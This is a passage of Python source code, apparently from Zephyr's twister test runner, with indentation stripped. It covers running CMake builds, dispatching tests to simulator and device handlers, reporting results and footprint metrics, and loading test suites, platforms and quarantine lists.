cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
results = {}
if p.returncode == 0:
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
self.instance.status = "passed"
if not self.instance.run:
self.instance.add_missing_testscases("skipped", "Test was built only")
results = {'msg': msg, "returncode": p.returncode, "instance": self.instance}
if out:
log_msg = out.decode(self.default_encoding)
with open(os.path.join(self.build_dir, self.log), "a", encoding=self.default_encoding) as log:
log.write(log_msg)
else:
return None
else:
# A real error occurred, raise an exception
log_msg = ""
if out:
log_msg = out.decode(self.default_encoding)
with open(os.path.join(self.build_dir, self.log), "a", encoding=self.default_encoding) as log:
log.write(log_msg)
if log_msg:
overflow_found = re.findall("region `(FLASH|ROM|RAM|ICCM|DCCM|SRAM)' overflowed by", log_msg)
if overflow_found and not self.overflow_as_errors:
logger.debug("Test skipped due to {} Overflow".format(overflow_found[0]))
self.instance.status = "skipped"
self.instance.reason = "{} overflow".format(overflow_found[0])
else:
self.instance.status = "error"
self.instance.reason = "Build failure"
results = {
"returncode": p.returncode,
"instance": self.instance,
}
return results
def run_cmake(self, args=[]):
if self.warnings_as_errors:
ldflags = "-Wl,--fatal-warnings"
cflags = "-Werror"
aflags = "-Werror -Wa,--fatal-warnings"
gen_defines_args = "--edtlib-Werror"
else:
ldflags = cflags = aflags = ""
gen_defines_args = ""
logger.debug("Running cmake on %s for %s" % (self.source_dir, self.platform.name))
cmake_args = [
f'-B{self.build_dir}',
f'-S{self.source_dir}',
f'-DTC_RUNID={self.instance.run_id}',
f'-DEXTRA_CFLAGS={cflags}',
f'-DEXTRA_AFLAGS={aflags}',
f'-DEXTRA_LDFLAGS={ldflags}',
f'-DEXTRA_GEN_DEFINES_ARGS={gen_defines_args}',
f'-G{self.generator}'
]
args = ["-D{}".format(a.replace('"', '')) for a in args]
cmake_args.extend(args)
cmake_opts = ['-DBOARD={}'.format(self.platform.name)]
cmake_args.extend(cmake_opts)
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
if p.returncode == 0:
filter_results = self.parse_generated()
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
logger.debug(msg)
results = {'msg': msg, 'filter': filter_results}
else:
self.instance.status = "error"
self.instance.reason = "Cmake build failure"
for tc in self.instance.testcases:
tc.status = self.instance.status
logger.error("Cmake build failure: %s for %s" % (self.source_dir, self.platform.name))
results = {"returncode": p.returncode}
if out:
with open(os.path.join(self.build_dir, self.log), "a", encoding=self.default_encoding) as log:
log_msg = out.decode(self.default_encoding)
log.write(log_msg)
return results
@staticmethod
def run_cmake_script(args=[]):
logger.debug("Running cmake script %s" % (args[0]))
cmake_args = ["-D{}".format(a.replace('"', '')) for a in args[1:]]
cmake_args.extend(['-P', args[0]])
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
if not cmake:
msg = "Unable to find `cmake` in path"
logger.error(msg)
raise Exception(msg)
cmd = [cmake] + cmake_args
kwargs = dict()
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
# It might happen that the environment adds ANSI escape codes like \x1b[0m,
# for instance if twister is executed from inside a makefile. In such a
# scenario it is then necessary to remove them, as otherwise the JSON decoding
# will fail.
ansi_escape = re.compile(r'\x1B(?:[@-Z\\-_]|\[[0-?]*[ -/]*[@-~])')
out = ansi_escape.sub('', out.decode())
if p.returncode == 0:
msg = "Finished running %s" % (args[0])
logger.debug(msg)
results = {"returncode": p.returncode, "msg": msg, "stdout": out}
else:
logger.error("Cmake script failure: %s" % (args[0]))
results = {"returncode": p.returncode, "returnmsg": out}
return results
class FilterBuilder(CMake):
def __init__(self, testsuite, platform, source_dir, build_dir):
super().__init__(testsuite, platform, source_dir, build_dir)
self.log = "config-twister.log"
def parse_generated(self):
if self.platform.name == "unit_testing":
return {}
cmake_cache_path = os.path.join(self.build_dir, "CMakeCache.txt")
defconfig_path = os.path.join(self.build_dir, "zephyr", ".config")
with open(defconfig_path, "r") as fp:
defconfig = {}
for line in fp.readlines():
m = self.config_re.match(line)
if not m:
if line.strip() and not line.startswith("#"):
sys.stderr.write("Unrecognized line %s\n" % line)
continue
defconfig[m.group(1)] = m.group(2).strip()
self.defconfig = defconfig
cmake_conf = {}
try:
cache = CMakeCache.from_file(cmake_cache_path)
except FileNotFoundError:
cache = {}
for k in iter(cache):
cmake_conf[k.name] = k.value
self.cmake_cache = cmake_conf
filter_data = {
"ARCH": self.platform.arch,
"PLATFORM": self.platform.name
}
filter_data.update(os.environ)
filter_data.update(self.defconfig)
filter_data.update(self.cmake_cache)
edt_pickle = os.path.join(self.build_dir, "zephyr", "edt.pickle")
if self.testsuite and self.testsuite.ts_filter:
try:
if os.path.exists(edt_pickle):
with open(edt_pickle, 'rb') as f:
edt = pickle.load(f)
else:
edt = None
res = expr_parser.parse(self.testsuite.ts_filter, filter_data, edt)
except (ValueError, SyntaxError) as se:
sys.stderr.write(
"Failed processing %s\n" % self.testsuite.yamlfile)
raise se
if not res:
return {os.path.join(self.platform.name, self.testsuite.name): True}
else:
return {os.path.join(self.platform.name, self.testsuite.name): False}
else:
self.platform.filter_data = filter_data
return filter_data
class ProjectBuilder(FilterBuilder):
def __init__(self, tplan, instance, **kwargs):
super().__init__(instance.testsuite, instance.platform, instance.testsuite.source_dir, instance.build_dir)
self.log = "build.log"
self.instance = instance
self.testplan = tplan
self.filtered_tests = 0
self.lsan = kwargs.get('lsan', False)
self.asan = kwargs.get('asan', False)
self.ubsan = kwargs.get('ubsan', False)
self.valgrind = kwargs.get('valgrind', False)
self.extra_args = kwargs.get('extra_args', [])
self.device_testing = kwargs.get('device_testing', False)
self.cmake_only = kwargs.get('cmake_only', False)
self.cleanup = kwargs.get('cleanup', False)
self.coverage = kwargs.get('coverage', False)
self.inline_logs = kwargs.get('inline_logs', False)
self.generator = kwargs.get('generator', None)
self.generator_cmd = kwargs.get('generator_cmd', None)
self.verbose = kwargs.get('verbose', None)
self.warnings_as_errors = kwargs.get('warnings_as_errors', True)
self.overflow_as_errors = kwargs.get('overflow_as_errors', False)
self.suite_name_check = kwargs.get('suite_name_check', True)
self.seed = kwargs.get('seed', 0)
@staticmethod
def log_info(filename, inline_logs):
filename = os.path.abspath(os.path.realpath(filename))
if inline_logs:
logger.info("{:-^100}".format(filename))
try:
with open(filename) as fp:
data = fp.read()
except Exception as e:
data = "Unable to read log data (%s)\n" % (str(e))
logger.error(data)
logger.info("{:-^100}".format(filename))
else:
logger.error("see: " + Fore.YELLOW + filename + Fore.RESET)
def log_info_file(self, inline_logs):
build_dir = self.instance.build_dir
h_log = "{}/handler.log".format(build_dir)
b_log = "{}/build.log".format(build_dir)
v_log = "{}/valgrind.log".format(build_dir)
d_log = "{}/device.log".format(build_dir)
if os.path.exists(v_log) and "Valgrind" in self.instance.reason:
self.log_info("{}".format(v_log), inline_logs)
elif os.path.exists(h_log) and os.path.getsize(h_log) > 0:
self.log_info("{}".format(h_log), inline_logs)
elif os.path.exists(d_log) and os.path.getsize(d_log) > 0:
self.log_info("{}".format(d_log), inline_logs)
else:
self.log_info("{}".format(b_log), inline_logs)
def setup_handler(self):
instance = self.instance
args = []
# FIXME: Needs simplification
if instance.platform.simulation == "qemu":
instance.handler = QEMUHandler(instance, "qemu")
args.append("QEMU_PIPE=%s" % instance.handler.get_fifo())
instance.handler.call_make_run = True
elif instance.testsuite.type == "unit":
instance.handler = BinaryHandler(instance, "unit")
instance.handler.binary = os.path.join(instance.build_dir, "testbinary")
if self.coverage:
args.append("COVERAGE=1")
elif instance.platform.type == "native":
handler = BinaryHandler(instance, "native")
handler.asan = self.asan
handler.valgrind = self.valgrind
handler.lsan = self.lsan
handler.ubsan = self.ubsan
handler.coverage = self.coverage
handler.binary = os.path.join(instance.build_dir, "zephyr", "zephyr.exe")
instance.handler = handler
elif instance.platform.simulation == "renode":
if find_executable("renode"):
instance.handler = BinaryHandler(instance, "renode")
instance.handler.pid_fn = os.path.join(instance.build_dir, "renode.pid")
instance.handler.call_make_run = True
elif instance.platform.simulation == "tsim":
instance.handler = BinaryHandler(instance, "tsim")
instance.handler.call_make_run = True
elif self.device_testing:
instance.handler = DeviceHandler(instance, "device")
instance.handler.coverage = self.coverage
elif instance.platform.simulation == "nsim":
if find_executable("nsimdrv"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.call_make_run = True
elif instance.platform.simulation == "mdb-nsim":
if find_executable("mdb"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.call_make_run = True
elif instance.platform.simulation == "armfvp":
instance.handler = BinaryHandler(instance, "armfvp")
instance.handler.call_make_run = True
elif instance.platform.simulation == "xt-sim":
instance.handler = BinaryHandler(instance, "xt-sim")
instance.handler.call_make_run = True
if instance.handler:
instance.handler.args = args
instance.handler.generator_cmd = self.generator_cmd
instance.handler.generator = self.generator
instance.handler.suite_name_check = self.suite_name_check
def process(self, pipeline, done, message, lock, results):
op = message.get('op')
if not self.instance.handler:
self.setup_handler()
# The build process, call cmake and build with configured generator
if op == "cmake":
res = self.cmake()
if self.instance.status in ["failed", "error"]:
pipeline.put({"op": "report", "test": self.instance})
elif self.cmake_only:
if self.instance.status is None:
self.instance.status = "passed"
pipeline.put({"op": "report", "test": self.instance})
else:
# Here we check the runtime filter results coming from running cmake
if self.instance.name in res['filter'] and res['filter'][self.instance.name]:
logger.debug("filtering %s" % self.instance.name)
self.instance.status = "filtered"
self.instance.reason = "runtime filter"
results.skipped_runtime += 1
self.instance.add_missing_testscases("skipped")
pipeline.put({"op": "report", "test": self.instance})
else:
pipeline.put({"op": "build", "test": self.instance})
elif op == "build":
logger.debug("build test: %s" % self.instance.name)
res = self.build()
if not res:
self.instance.status = "error"
self.instance.reason = "Build Failure"
pipeline.put({"op": "report", "test": self.instance})
else:
# Count skipped cases during build, for example
# due to ram/rom overflow.
if self.instance.status == "skipped":
results.skipped_runtime += 1
self.instance.add_missing_testscases("skipped", self.instance.reason)
if res.get('returncode', 1) > 0:
self.instance.add_missing_testscases("blocked", self.instance.reason)
pipeline.put({"op": "report", "test": self.instance})
else:
pipeline.put({"op": "gather_metrics", "test": self.instance})
elif op == "gather_metrics":
self.gather_metrics(self.instance)
if self.instance.run and self.instance.handler:
pipeline.put({"op": "run", "test": self.instance})
else:
pipeline.put({"op": "report", "test": self.instance})
# Run the generated binary using one of the supported handlers
elif op == "run":
logger.debug("run test: %s" % self.instance.name)
self.run()
logger.debug(f"run status: {self.instance.name} {self.instance.status}")
# to make it work with pickle
self.instance.handler.thread = None
self.instance.handler.testplan = None
pipeline.put({
"op": "report",
"test": self.instance,
"status": self.instance.status,
"reason": self.instance.reason
}
)
# Report results and output progress to screen
elif op == "report":
with lock:
done.put(self.instance)
self.report_out(results)
if self.cleanup and not self.coverage and self.instance.status == "passed":
pipeline.put({
"op": "cleanup",
"test": self.instance
})
elif op == "cleanup":
if self.device_testing:
self.cleanup_device_testing_artifacts()
else:
self.cleanup_artifacts()
def cleanup_artifacts(self, additional_keep=[]):
logger.debug("Cleaning up {}".format(self.instance.build_dir))
allow = [
'zephyr/.config',
'handler.log',
'build.log',
'device.log',
'recording.csv',
]
allow += additional_keep
allow = [os.path.join(self.instance.build_dir, file) for file in allow]
for dirpath, dirnames, filenames in os.walk(self.instance.build_dir, topdown=False):
for name in filenames:
path = os.path.join(dirpath, name)
if path not in allow:
os.remove(path)
# Remove empty directories and symbolic links to directories
for dir in dirnames:
path = os.path.join(dirpath, dir)
if os.path.islink(path):
os.remove(path)
elif not os.listdir(path):
os.rmdir(path)
def cleanup_device_testing_artifacts(self):
logger.debug("Cleaning up for Device Testing {}".format(self.instance.build_dir))
sanitizelist = [
'CMakeCache.txt',
'zephyr/runners.yaml',
]
keep = [
'zephyr/zephyr.hex',
'zephyr/zephyr.bin',
'zephyr/zephyr.elf',
]
keep += sanitizelist
self.cleanup_artifacts(keep)
# sanitize paths so files are relocatable
for file in sanitizelist:
file = os.path.join(self.instance.build_dir, file)
with open(file, "rt") as fin:
data = fin.read()
data = data.replace(canonical_zephyr_base+"/", "")
with open(file, "wt") as fin:
fin.write(data)
def report_out(self, results):
total_to_do = results.total
total_tests_width = len(str(total_to_do))
results.done += 1
instance = self.instance
if instance.status in ["error", "failed"]:
if instance.status == "error":
results.error += 1
else:
results.failed += 1
if self.verbose:
status = Fore.RED + "FAILED " + Fore.RESET + instance.reason
else:
print("")
logger.error(
"{:<25} {:<50} {}FAILED{}: {}".format(
instance.platform.name,
instance.testsuite.name,
Fore.RED,
Fore.RESET,
instance.reason))
if not self.verbose:
self.log_info_file(self.inline_logs)
elif instance.status in ["skipped", "filtered"]:
status = Fore.YELLOW + "SKIPPED" + Fore.RESET
results.skipped_configs += 1
results.skipped_cases += len(instance.testsuite.testcases)
elif instance.status == "passed":
status = Fore.GREEN + "PASSED" + Fore.RESET
results.passed += 1
for case in instance.testcases:
if case.status == 'skipped':
results.skipped_cases += 1
else:
logger.debug(f"Unknown status = {instance.status}")
status = Fore.YELLOW + "UNKNOWN" + Fore.RESET
if self.verbose:
if self.cmake_only:
more_info = "cmake"
elif instance.status in ["skipped", "filtered"]:
more_info = instance.reason
else:
if instance.handler and instance.run:
more_info = instance.handler.type_str
htime = instance.execution_time
if htime:
more_info += " {:.3f}s".format(htime)
else:
more_info = "build"
if ( instance.status in ["error", "failed", "timeout", "flash_error"]
and hasattr(self.instance.handler, 'seed')
and self.instance.handler.seed is not None ):
more_info += "/seed: " + str(self.seed)
logger.info("{:>{}}/{} {:<25} {:<50} {} ({})".format(
results.done + results.skipped_filter, total_tests_width, total_to_do , instance.platform.name,
instance.testsuite.name, status, more_info))
if instance.status in ["error", "failed", "timeout"]:
self.log_info_file(self.inline_logs)
else:
completed_perc = 0
if total_to_do > 0:
completed_perc = int((float(results.done + results.skipped_filter) / total_to_do) * 100)
sys.stdout.write("\rINFO - Total complete: %s%4d/%4d%s %2d%% skipped: %s%4d%s, failed: %s%4d%s" % (
Fore.GREEN,
results.done + results.skipped_filter,
total_to_do,
Fore.RESET,
completed_perc,
Fore.YELLOW if results.skipped_configs > 0 else Fore.RESET,
results.skipped_filter + results.skipped_runtime,
Fore.RESET,
Fore.RED if results.failed > 0 else Fore.RESET,
results.failed,
Fore.RESET
)
)
sys.stdout.flush()
def cmake(self):
instance = self.instance
args = self.testsuite.extra_args[:]
args += self.extra_args
if instance.handler:
args += instance.handler.args
# merge overlay files into one variable
def extract_overlays(args):
re_overlay = re.compile('OVERLAY_CONFIG=(.*)')
other_args = []
overlays = []
for arg in args:
match = re_overlay.search(arg)
if match:
overlays.append(match.group(1).strip('\'"'))
else:
other_args.append(arg)
args[:] = other_args
return overlays
overlays = extract_overlays(args)
if os.path.exists(os.path.join(instance.build_dir,
"twister", "testsuite_extra.conf")):
overlays.append(os.path.join(instance.build_dir,
"twister", "testsuite_extra.conf"))
if overlays:
args.append("OVERLAY_CONFIG=\"%s\"" % (" ".join(overlays)))
res = self.run_cmake(args)
return res
def build(self):
res = self.run_build(['--build', self.build_dir])
return res
def run(self):
instance = self.instance
if instance.handler:
if instance.handler.type_str == "device":
instance.handler.testplan = self.testplan
if(self.seed is not None and instance.platform.name.startswith("native_posix")):
self.parse_generated()
if('CONFIG_FAKE_ENTROPY_NATIVE_POSIX' in self.defconfig and
self.defconfig['CONFIG_FAKE_ENTROPY_NATIVE_POSIX'] == 'y'):
instance.handler.seed = self.seed
instance.handler.handle()
sys.stdout.flush()
def gather_metrics(self, instance):
if self.testplan.enable_size_report and not self.testplan.cmake_only:
self.calc_one_elf_size(instance)
else:
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["unrecognized"] = []
@staticmethod
def calc_one_elf_size(instance):
if instance.status not in ["error", "failed", "skipped"]:
if instance.platform.type != "native":
size_calc = instance.calculate_sizes()
instance.metrics["ram_size"] = size_calc.get_ram_size()
instance.metrics["rom_size"] = size_calc.get_rom_size()
instance.metrics["unrecognized"] = size_calc.unrecognized_sections()
else:
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["unrecognized"] = []
instance.metrics["handler_time"] = instance.execution_time
class TestPlan(DisablePyTestCollectionMixin):
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
ts_schema = scl.yaml_load(
os.path.join(ZEPHYR_BASE,
"scripts", "schemas", "twister", "testsuite-schema.yaml"))
quarantine_schema = scl.yaml_load(
os.path.join(ZEPHYR_BASE,
"scripts", "schemas", "twister", "quarantine-schema.yaml"))
testsuite_valid_keys = {"tags": {"type": "set", "required": False},
"type": {"type": "str", "default": "integration"},
"extra_args": {"type": "list"},
"extra_configs": {"type": "list"},
"build_only": {"type": "bool", "default": False},
"build_on_all": {"type": "bool", "default": False},
"skip": {"type": "bool", "default": False},
"slow": {"type": "bool", "default": False},
"timeout": {"type": "int", "default": 60},
"min_ram": {"type": "int", "default": 8},
"modules": {"type": "list", "default": []},
"depends_on": {"type": "set"},
"min_flash": {"type": "int", "default": 32},
"arch_allow": {"type": "set"},
"arch_exclude": {"type": "set"},
"extra_sections": {"type": "list", "default": []},
"integration_platforms": {"type": "list", "default": []},
"testcases": {"type": "list", "default": []},
"platform_type": {"type": "list", "default": []},
"platform_exclude": {"type": "set"},
"platform_allow": {"type": "set"},
"toolchain_exclude": {"type": "set"},
"toolchain_allow": {"type": "set"},
"filter": {"type": "str"},
"harness": {"type": "str"},
"harness_config": {"type": "map", "default": {}},
"seed": {"type": "int", "default": 0}
}
SAMPLE_FILENAME = 'sample.yaml'
TESTSUITE_FILENAME = 'testcase.yaml'
def __init__(self, board_root_list=[], testsuite_roots=[], outdir=None):
self.roots = testsuite_roots
if not isinstance(board_root_list, list):
self.board_roots = [board_root_list]
else:
self.board_roots = board_root_list
# Test Plan Options
self.coverage_platform = []
self.build_only = False
self.cmake_only = False
self.cleanup = False
self.enable_slow = False
self.device_testing = False
self.fixtures = []
self.enable_coverage = False
self.enable_ubsan = False
self.enable_lsan = False
self.enable_asan = False
self.detailed_skipped_report = False
self.enable_valgrind = False
self.extra_args = []
self.inline_logs = False
self.enable_sizes_report = False
self.west_flash = None
self.west_runner = None
self.generator = None
self.generator_cmd = None
self.warnings_as_errors = True
self.overflow_as_errors = False
self.quarantine_verify = False
self.retry_build_errors = False
self.suite_name_check = True
self.seed = 0
# Keep track of which test cases we've filtered out and why
self.testsuites = {}
self.quarantine = {}
self.platforms = []
self.platform_names = []
self.selected_platforms = []
self.filtered_platforms = []
self.default_platforms = []
self.outdir = os.path.abspath(outdir)
self.discards = {}
self.load_errors = 0
self.instances = dict()
self.total_platforms = 0
self.start_time = 0
self.duration = 0
self.warnings = 0
# hardcoded for now
self.duts = []
# run integration tests only
self.integration = False
# used during creating shorter build paths
self.link_dir_counter = 0
self.pipeline = None
self.version = "NA"
self.modules = []
self.timestamp = datetime.now().isoformat()
def check_zephyr_version(self):
try:
subproc = subprocess.run(["git", "describe", "--abbrev=12", "--always"],
stdout=subprocess.PIPE,
universal_newlines=True,
cwd=ZEPHYR_BASE)
if subproc.returncode == 0:
self.version = subproc.stdout.strip()
logger.info(f"Zephyr version: {self.version}")
except OSError:
logger.info("Cannot read zephyr version.")
def get_platform_instances(self, platform):
filtered_dict = {k:v for k,v in self.instances.items() if k.startswith(platform + os.sep)}
return filtered_dict
def config(self):
logger.info("coverage platform: {}".format(self.coverage_platform))
# Debug Functions
@staticmethod
def info(what):
sys.stdout.write(what + "\n")
sys.stdout.flush()
def update_counting(self, results=None):
for instance in self.instances.values():
results.cases += len(instance.testsuite.testcases)
if instance.status == 'filtered':
results.skipped_filter += 1
results.skipped_configs += 1
elif instance.status == 'passed':
results.passed += 1
results.done += 1
elif instance.status == 'error':
results.error += 1
results.done += 1
def compare_metrics(self, filename):
# name, datatype, lower results better
interesting_metrics = [("ram_size", int, True),
("rom_size", int, True)]
if not os.path.exists(filename):
logger.error("Cannot compare metrics, %s not found" % filename)
return []
results = []
saved_metrics = {}
with open(filename) as fp:
jt = json.load(fp)
for ts in jt.get("testsuites", []):
d = {}
for m, _, _ in interesting_metrics:
d[m] = ts.get(m, 0)
ts_name = ts.get('name')
ts_platform = ts.get('platform')
saved_metrics[(ts_name, ts_platform)] = d
for instance in self.instances.values():
mkey = (instance.testsuite.name, instance.platform.name)
if mkey not in saved_metrics:
continue
sm = saved_metrics[mkey]
for metric, mtype, lower_better in interesting_metrics:
if metric not in instance.metrics:
continue
if sm[metric] == "":
continue
delta = instance.metrics.get(metric, 0) - mtype(sm[metric])
if delta == 0:
continue
results.append((instance, metric, instance.metrics.get(metric, 0), delta,
lower_better))
return results
def footprint_reports(self, report, show_footprint, all_deltas,
footprint_threshold, last_metrics):
if not report:
return
logger.debug("running footprint_reports")
deltas = self.compare_metrics(report)
warnings = 0
if deltas and show_footprint:
for i, metric, value, delta, lower_better in deltas:
if not all_deltas and ((delta < 0 and lower_better) or
(delta > 0 and not lower_better)):
continue
percentage = 0
if value > delta:
percentage = (float(delta) / float(value - delta))
if not all_deltas and (percentage < (footprint_threshold / 100.0)):
continue
logger.info("{:<25} {:<60} {}{}{}: {} {:<+4}, is now {:6} {:+.2%}".format(
i.platform.name, i.testsuite.name, Fore.YELLOW,
"INFO" if all_deltas else "WARNING", Fore.RESET,
metric, delta, value, percentage))
warnings += 1
if warnings:
logger.warning("Deltas based on metrics from last %s" %
("release" if not last_metrics else "run"))
def summary(self, results, unrecognized_sections):
failed = 0
run = 0
for instance in self.instances.values():
if instance.status == "failed":
failed += 1
elif instance.metrics.get("unrecognized") and not unrecognized_sections:
logger.error("%sFAILED%s: %s has unrecognized binary sections: %s" %
(Fore.RED, Fore.RESET, instance.name,
str(instance.metrics.get("unrecognized", []))))
failed += 1
# FIXME: need a better way to identify executed tests
handler_time = instance.metrics.get('handler_time', 0)
if float(handler_time) > 0:
run += 1
if results.total and results.total != results.skipped_configs:
pass_rate = (float(results.passed) / float(results.total - results.skipped_configs))
else:
pass_rate = 0
logger.info(
"{}{} of {}{} test configurations passed ({:.2%}), {}{}{} failed, {} skipped with {}{}{} warnings in {:.2f} seconds".format(
Fore.RED if failed else Fore.GREEN,
results.passed,
results.total,
Fore.RESET,
pass_rate,
Fore.RED if results.failed else Fore.RESET,
results.failed + results.error,
Fore.RESET,
results.skipped_configs,
Fore.YELLOW if self.warnings else Fore.RESET,
self.warnings,
Fore.RESET,
self.duration))
self.total_platforms = len(self.platforms)
# if we are only building, do not report about tests being executed.
if self.platforms and not self.build_only:
logger.info("In total {} test cases were executed, {} skipped on {} out of total {} platforms ({:02.2f}%)".format(
results.cases - results.skipped_cases,
results.skipped_cases,
len(self.filtered_platforms),
self.total_platforms,
(100 * len(self.filtered_platforms) / len(self.platforms))
))
built_only = results.total - run - results.skipped_configs
logger.info(f"{Fore.GREEN}{run}{Fore.RESET} test configurations executed on platforms, \
{Fore.RED}{built_only}{Fore.RESET} test configurations were only built.")
def save_reports(self, name, suffix, report_dir, no_update, platform_reports):
if not self.instances:
return
logger.info("Saving reports...")
if name:
report_name = name
else:
report_name = "twister"
if report_dir:
os.makedirs(report_dir, exist_ok=True)
filename = os.path.join(report_dir, report_name)
outdir = report_dir
else:
filename = os.path.join(self.outdir, report_name)
outdir = self.outdir
if suffix:
filename = "{}_{}".format(filename, suffix)
if not no_update:
json_file = filename + ".json"
self.json_report(json_file, version=self.version)
self.xunit_report(json_file, filename + ".xml", full_report=False)
self.xunit_report(json_file, filename + "_report.xml", full_report=True)
self.xunit_report_suites(json_file, filename + "_suite_report.xml")
if platform_reports:
self.target_report(json_file, outdir, suffix)
def target_report(self, json_file, outdir, suffix):
platforms = {inst.platform.name for _, inst in self.instances.items()}
for platform in platforms:
if suffix:
filename = os.path.join(outdir,"{}_{}.xml".format(platform, suffix))
else:
filename = os.path.join(outdir,"{}.xml".format(platform))
self.xunit_report(json_file, filename, platform, full_report=True)
def add_configurations(self):
for board_root in self.board_roots:
board_root = os.path.abspath(board_root)
logger.debug("Reading platform configuration files under %s..." %
board_root)
for file in glob.glob(os.path.join(board_root, "*", "*", "*.yaml")):
try:
platform = Platform()
platform.load(file)
if platform.name in [p.name for p in self.platforms]:
logger.error(f"Duplicate platform {platform.name} in {file}")
raise Exception(f"Duplicate platform identifier {platform.name} found")
if platform.twister:
self.platforms.append(platform)
if platform.default:
self.default_platforms.append(platform.name)
except RuntimeError as e:
logger.error("E: %s: can't load: %s" % (file, e))
self.load_errors += 1
self.platform_names = [p.name for p in self.platforms]
def get_all_tests(self):
testcases = []
for _, ts in self.testsuites.items():
for case in ts.testcases:
testcases.append(case)
return testcases
@staticmethod
def get_toolchain():
toolchain_script = Path(ZEPHYR_BASE) / Path('cmake/modules/verify-toolchain.cmake')
result = CMake.run_cmake_script([toolchain_script, "FORMAT=json"])
try:
if result['returncode']:
raise TwisterRuntimeError(f"E: {result['returnmsg']}")
except Exception as e:
print(str(e))
sys.exit(2)
toolchain = json.loads(result['stdout'])['ZEPHYR_TOOLCHAIN_VARIANT']
logger.info(f"Using '{toolchain}' toolchain.")
return toolchain
def add_testsuites(self, testsuite_filter=[]):
for root in self.roots:
root = os.path.abspath(root)
logger.debug("Reading test case configuration files under %s..." % root)
for dirpath, _, filenames in os.walk(root, topdown=True):
if self.SAMPLE_FILENAME in filenames:
filename = self.SAMPLE_FILENAME
elif self.TESTSUITE_FILENAME in filenames:
filename = self.TESTSUITE_FILENAME
else:
continue
logger.debug("Found possible test case in " + dirpath)
ts_path = os.path.join(dirpath, filename)
try:
parsed_data = TwisterConfigParser(ts_path, self.ts_schema)
parsed_data.load()
ts_path = os.path.dirname(ts_path)
workdir = os.path.relpath(ts_path, root)
for name in parsed_data.tests.keys():
ts = TestSuite(root, workdir, name)
ts_dict = parsed_data.get_test(name, self.testsuite_valid_keys)
ts.source_dir = ts_path
ts.yamlfile = ts_path
ts.type = ts_dict["type"]
ts.tags = ts_dict["tags"]
ts.extra_args = ts_dict["extra_args"]
ts.extra_configs = ts_dict["extra_configs"]
ts.arch_allow = ts_dict["arch_allow"]
ts.arch_exclude = ts_dict["arch_exclude"]
ts.skip = ts_dict["skip"]
ts.platform_exclude = ts_dict["platform_exclude"]
ts.platform_allow = ts_dict["platform_allow"]
ts.platform_type = ts_dict["platform_type"]
ts.toolchain_exclude = ts_dict["toolchain_exclude"]
ts.toolchain_allow = ts_dict["toolchain_allow"]
ts.ts_filter = ts_dict["filter"]
ts.timeout = ts_dict["timeout"]
ts.harness = ts_dict["harness"]
ts.harness_config = ts_dict["harness_config"]
if ts.harness == 'console' and not ts.harness_config:
raise Exception('Harness config error: console harness defined without a configuration.')
ts.build_only = ts_dict["build_only"]
ts.build_on_all = ts_dict["build_on_all"]
ts.slow = ts_dict["slow"]
ts.min_ram = ts_dict["min_ram"]
ts.modules = ts_dict["modules"]
ts.depends_on = ts_dict["depends_on"]
ts.min_flash = ts_dict["min_flash"]
ts.extra_sections = ts_dict["extra_sections"]
ts.integration_platforms = ts_dict["integration_platforms"]
ts.seed = ts_dict["seed"]
testcases = ts_dict.get("testcases", [])
if testcases:
for tc in testcases:
ts.add_testcase(name=f"{name}.{tc}")
else:
ts.parse_subcases(ts_path)
if testsuite_filter:
if ts.name and ts.name in testsuite_filter:
self.testsuites[ts.name] = ts
else:
self.testsuites[ts.name] = ts
except Exception as e:
logger.error("%s: can't load (skipping): %s" % (ts_path, e))
self.load_errors += 1
return len(self.testsuites)
def get_platform(self, name):
selected_platform = None
for platform in self.platforms:
if platform.name == name:
selected_platform = platform
break
return selected_platform
def load_quarantine(self, file):
"""
Loads quarantine list from the given yaml file. Creates a dictionary
of all tests configurations (platform + scenario: comment) that shall be
skipped due to quarantine
"""
# Load yaml into quarantine_yaml
quarantine_yaml = scl.yaml_load_verify(file, self.quarantine_schema)
# Create quarantine_list with a product of the listed
# platforms and scenarios for each entry in quarantine yaml
quarantine_list = []
for quar_dict in quarantine_yaml:
if quar_dict['platforms'][0] == "all":
plat = self.platform_names
else:
plat = quar_dict['platforms']
comment = quar_dict.get('comment', "NA")
quarantine_list.append([{".".join([p, s]): comment}
for p in plat for s in quar_dict['scenarios']])
# Flatten the quarantine_list
quarantine_list = [it for sublist in quarantine_list for it in sublist]
# Change quarantine_list into a dictionary
for d in quarantine_list:
self.quarantine.update(d)
def load_from_file(self, file, filter_platform=[]):
with open(file, "r") as json_test_plan:
jtp = json.load(json_test_plan)
instance_list = []
for ts in jtp.get("testsuites", []):
logger.debug(f"loading {ts['name']}...")
testsuite = ts["name"]
platform = self.get_platform(ts["platform"])
if filter_platform and platform.name not in filter_platform:
continue
instance = TestInstance(self.testsuites[testsuite], platform, self.outdir)
if ts.get("run_id"):
instance.run_id = ts.get("run_id")
if self.device_testing:
tfilter = 'runnable'
else:
tfilter = 'buildable'
instance.run = instance.check_runnable(
self.enable_slow,
tfilter,
self.fixtures
)
instance.metrics['handler_time'] = ts.get('execution_time', 0)
